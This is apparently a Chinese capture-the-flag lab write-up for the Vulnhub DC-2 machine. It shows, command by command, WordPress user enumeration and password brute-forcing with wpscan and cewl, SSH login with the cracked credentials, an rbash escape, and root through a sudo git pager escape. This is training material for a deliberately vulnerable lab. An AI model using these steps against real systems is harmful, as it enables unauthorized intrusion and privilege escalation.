靶机:Vulnhub-DC-2

靶机:Vulnhub-DC-2

daoyuan

零、环境配置

1、虚拟机:vmware 15.5.6

2、攻击环境:kali linux 2020.3 192.168.143.128

3、靶机:DC-2

靶机直接从虚拟机wmware中打开,注意将网络适配器改为nat模式。

一、信息收集

1、主机存活扫描

arp-scan -l 

靶机:Vulnhub-DC-2

2、端口扫描

nmap -A -p- 192.168.143.135
发现开放的端口以及服务
80 wordpress
7744 ssh

靶机:Vulnhub-DC-2

3、脚本扫描

nmap --script=vuln 192.168.143.135

探测到网站CMS为wordpress,且有三个账号
admin
tom
jerry

靶机:Vulnhub-DC-2

二、漏洞探测

访问网站ip,无法显示,但网址栏解析域名为dc-2,
猜想是域名定向问题,直接在本地将ip与域名绑定。
sudo vim /etc/hosts

靶机:Vulnhub-DC-2
靶机:Vulnhub-DC-2

重新登入,可以访问,提示flag
flag1提示
提示一、需要cewl,百度cewl是啥~
提示二、一个账号不能找到就换一个

靶机:Vulnhub-DC-2
靶机:Vulnhub-DC-2

靶机:Vulnhub-DC-2

用cewl生成密码字典
cewl dc-2 > dc2.txt

靶机:Vulnhub-DC-2

用针对wordpress的扫描工具wordscan探测该域名
wpscan –-url http://dc-2 -e u //爆破用户名

扫描到网站有三个账号
admin
tom
jerry
在root目录下创建文档dc2.txt写入用户名字典

靶机:Vulnhub-DC-2靶机:Vulnhub-DC-2

靶机:Vulnhub-DC-2

三、漏洞利用

wpscan --url http://dc-2 -U dc2u.txt -P dc2.txt  //利用wpscan爆破密码
 爆破出密码
 Username: jerry, Password: adipiscing
 Username: tom, Password: parturient

靶机:Vulnhub-DC-2

靶机:Vulnhub-DC-2

nikto -h http://dc-2  //网站敏感页面扫描
找到账号登入界面/wp-login.php

靶机:Vulnhub-DC-2靶机:Vulnhub-DC-2

登入账号得到 flag2,提示。。。。。。不知道它说什么

靶机:Vulnhub-DC-2

ssh账号密码远程登入
ssh jerry@192.168.143.135 -p 7744
echo $0 //查看权限 rbash
ls 
发现flag3 cat不可查看 

靶机:Vulnhub-DC-2

rbash是受限制的shell,这里设法绕过rbash 
BASH_CMDS[a]=/bin/sh;a
/bin/bash

export PATH=$PATH:/bin/  #添加环境变量
export PATH=$PATH:/usr/bin  #使用cat命令

cat flag3.txt
绕过了rbash限制,查看flag3,得到提示su

靶机:Vulnhub-DC-2

su jerry //切换用户

发现flag4

cat flag4.txt

提示 git提权

靶机:Vulnhub-DC-2

sudo -l
查看可执行命令
得到git有root权限免密

sudo git -p help config
!/bin/sh

得到root,查看最终的flag
cat flag5.txt

靶机:Vulnhub-DC-2
靶机:Vulnhub-DC-2
如有错误,烦请不吝赐教。
转载请注明出处!
https://blog.csdn.net/qq_44877412

上一篇:Vulnhub-DC-3靶场练习


下一篇:Vulnhub靶机实战-CH4INRULZ